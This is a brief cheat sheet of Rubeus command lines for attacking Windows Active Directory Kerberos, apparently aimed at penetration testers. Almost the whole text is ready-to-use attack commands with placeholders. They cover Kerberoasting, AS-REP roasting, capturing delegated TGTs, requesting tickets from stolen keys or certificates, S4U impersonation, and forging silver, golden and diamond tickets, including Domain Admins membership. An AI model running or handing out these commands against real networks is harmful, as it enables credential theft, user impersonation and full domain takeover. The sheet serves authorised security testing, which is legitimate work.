Rubeus
Table of content
- Kerberoast
- AS-REP Roasting
- Unconstrained delegation
- Get TGT from eKeys
- Get TGT from certificate
- Extract machine TGT
- Get TGS from TGT
- Generate Silver Ticket
- Generate Golden Ticket
- Generate Diamond Ticket
Kerberoast
All SPN:
Rubeus.exe kerberoast /simple /nowrap
For a given SPN:
Rubeus.exe kerberoast /user:${SPN} /nowrap
AS-REP Roasting
Rubeus.exe asreproast /user:svc_oracle /nowrap
Unconstrained delegation
Monitor and extract TGT
Rubeus.exe monitor /targetuser:nlamb /interval:10
Get TGT from eKeys
Rubeus.exe asktgt /user:${machineAccount} /aes256:${aesKey} /opsec /nowrap
Get TGT from certificate
Rubeus.exe asktgt /user:${user} /certificate:${base64PFX} /password:${pfxPassword} /nowrap
Extract machine TGT
Rubeus.exe triage
Get TGS from TGT
Using TGT from Constrained Delegation
Rubeus.exe s4u /impersonateuser:${userToImpersonate} /msdsspn:${spnToImpersonate} /user:${principalAllowedToPerformDelegation} /ticket:${base64TGT} /nowrap
Use the
/altservice:${serviceName}to ask for a different service than the one described in theConstrained Delegation
Generate Silver Ticket
Rubeus.exe silver /service:${service}/${machineDNS} /aes256:${computerKey} /user:${impersonatedUser} /domain:${domain} /sid:${userSID} /nowrap
Generate Golden Ticket
# Use /sids parameter to add an extra SID for cross domain tickets
Rubeus.exe golden /aes256:${krbtgtKey} /user:${impersonatedUser} /domain:${domain} /sid:${domainSID} /nowrap
Generate Diamond Ticket
# Use /sids parameter to add an extra SID for cross domain tickets
Rubeus.exe diamond /tgtdeleg /ticketuser:${impersonatedUser} /ticketuserid:${impersonatedUserRID} /groups:512 /krbkey:${krbtgtKey} /nowrap